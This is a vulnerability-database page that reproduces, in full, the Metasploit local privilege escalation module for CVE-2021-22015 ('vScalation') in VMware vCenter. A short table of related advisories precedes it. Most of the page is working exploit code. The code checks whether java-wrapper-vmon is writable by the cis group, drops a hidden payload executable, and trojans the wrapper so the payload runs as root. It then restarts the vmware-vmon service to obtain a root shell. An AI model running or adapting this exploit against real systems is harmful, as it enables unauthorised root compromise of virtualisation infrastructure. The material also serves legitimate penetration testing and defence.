Vulners
Lucene search
VMware vCenter vScalation Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Exploit for Files or Directories Accessible to External Parties in Vmware Cloud_Foundation | 30 Sep 202107:16 | – | githubexploit |
 | The vulnerability of the management tools for virtual infrastructure, such as VMware vCenter Server and VMware Cloud Foundation, relates to insecure management of privileges, allowing attackers to escalate their privileges. | 8 Oct 202100:00 | – | bdu_fstec |
 | CVE-2021-22015 | 23 Sep 202116:29 | – | circl |
 | VMware vCenter Server 安全漏洞 | 21 Sep 202100:00 | – | cnnvd |
 | VMware vCenter Server Local Authority Lifting Vulnerability | 24 Sep 202100:00 | – | cnvd |
 | CVE-2021-22015 | 23 Sep 202100:00 | – | cve |
 | CVE-2021-22015 | 23 Sep 202100:00 | – | cvelist |
 | EUVD-2021-9184 | 3 Oct 202520:07 | – | euvd |
 | VMware vCenter vScalation Priv Esc | 5 Dec 202219:51 | – | metasploit |
 | Vulnerabilities fixed in VMware vCenter Server | 22 Sep 202100:00 | – | ncsc |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Post::Linux::Priv
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware vCenter vScalation Priv Esc',
'Description' => %q{
This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
/usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the
cis group to write to the file, which will execute as root on vmware-vmon service
restart or host reboot.
This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
The following versions should be vulnerable:
vCenter 7.0 before U2c
vCenter 6.7 before U3o
vCenter 6.5 before U3q
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Yuval Lazar' # original PoC, analysis
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' => [
[ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],
[ 'CVE', '2021-22015' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]
],
'DisclosureDate' => '2021-09-21',
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 1800 # 30min
},
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],
'AKA' => ['vScalation']
}
)
)
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
# Simplify pulling the writable directory variable
def base_dir
datastore['WritableDir'].to_s
end
def java_wrapper_vmon
'/usr/lib/vmware-vmon/java-wrapper-vmon'
end
def check
group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")
if writable?(java_wrapper_vmon) && group_owner == 'cis'
return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")
end
CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")
end
def exploit
# Check if we're already root
if is_root? && !datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
# Make sure we can write our exploit and payload to the local system
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# backup the original file
@backup = read_file(java_wrapper_vmon)
path = store_loot(
'java-wrapper-vmon.text',
'text/plain',
rhost,
@backup,
'java-wrapper-vmon.text'
)
print_good("Original #{java_wrapper_vmon} backed up to #{path}")
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
print_status("Writing payload to #{payload_path}")
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup payload_path
# write trojaned file
# we want to write our payload towards the top to ensure it gets run
# writing it at the bottom of the file results in the payload not being run
print_status("Writing trojaned #{java_wrapper_vmon}")
write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))
# try to restart the service
print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')
service_restart = cmd_exec('systemctl restart vmware-vmon.service')
# one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files
if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')
print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')
end
print_status("Waiting #{datastore['WfsDelay']} seconds for shell")
end
def cleanup
unless @backup.nil?
print_status("Replacing trojaned #{java_wrapper_vmon} with original")
write_file(java_wrapper_vmon, @backup)
end
super
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2022 00:00Current
1.6Low risk
Vulners AI Score1.6
CVSS 27.2
CVSS 3.17.8
EPSS0.01789